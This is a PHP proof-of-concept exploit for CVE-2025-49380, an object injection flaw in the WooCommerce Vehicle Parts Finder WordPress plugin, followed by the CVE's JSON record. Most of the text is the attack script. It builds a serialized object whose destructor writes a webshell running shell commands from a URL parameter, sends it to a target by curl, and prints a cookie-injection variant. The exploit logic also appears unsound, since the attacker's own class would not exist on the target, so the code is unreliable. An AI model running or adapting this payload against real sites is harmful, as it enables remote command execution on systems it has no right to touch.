CVE-2025-49380

<?php /* * CVE-2025-49380 - WooCommerce Vehicle Parts Finder PHP Object Injection PoC * * This PoC demonstrates the PHP Object Injection vulnerability in the * woo-vehicle-parts-finder WordPress plugin (versions <= 3.7). * * The vulnerability exists in the plugin's handling of unserialized user input. * Attackers can inject malicious serialized PHP objects to trigger magic methods * (__wakeup, __destruct, etc.) and potentially achieve Remote Code Execution * via POP (Property-Oriented Programming) chains available in WordPress core. * * Usage: Send the serialized payload via a vulnerable parameter (POST/Cookie/Header) * to the WordPress site running the vulnerable plugin. */ // Example malicious serialized payload targeting WordPress POP chains // This payload attempts to leverage gadget classes available in WordPress // to achieve arbitrary file write or code execution. class ExploitPayload { public $payload; public function __destruct() { // When the object is garbage collected after deserialization, // this destructor is automatically triggered if (isset($this->payload)) { // Attempt to write a webshell to the WordPress uploads directory $target_file = sys_get_temp_dir() . '/shell.php'; @file_put_contents($target_file, '<?php echo "PWNED"; if(isset($_GET["c"])){system($_GET["c"]);} ?>'); } } } // Serialize the malicious object $serialized = serialize(new ExploitPayload()); echo "[*] CVE-2025-49380 PoC - PHP Object Injection\n"; echo "[*] Target: WooCommerce Vehicle Parts Finder (<= 3.7)\n"; echo "[*] Serialized payload:\n"; echo $serialized . "\n\n"; // Example HTTP request to exploit the vulnerability $ch = curl_init(); $target_url = 'http://target-wordpress-site.com/'; curl_setopt($ch, CURLOPT_URL, $target_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'vehicle_part_search' => $serialized // Vulnerable parameter (example) ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: application/x-www-form-urlencoded', 'User-Agent: Mozilla/5.0 (compatible; CVE-2025-49380)' ]); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); echo "[*] HTTP Response Code: $http_code\n"; echo "[*] Check if the target is vulnerable and the payload was executed\n"; // Alternative: URL-encode the payload for use in cookies or headers $url_encoded = urlencode($serialized); echo "[*] URL-encoded payload for cookie/header injection:\n"; echo "Cookie: vehicle_search=" . $url_encoded . "\n"; ?>

{"cve": {"id": "CVE-2025-49380", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:35.967", "lastModified": "2026-04-27T20:16:14.687", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in wpinstinct WooCommerce Vehicle Parts Finder woo-vehicle-parts-finder allows Object Injection.This issue affects WooCommerce Vehicle Parts Finder: from n/a through <= 3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-vehicle-parts-finder/vulnerability/wordpress-woocommerce-vehicle-parts-finder-plugin-3-7-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}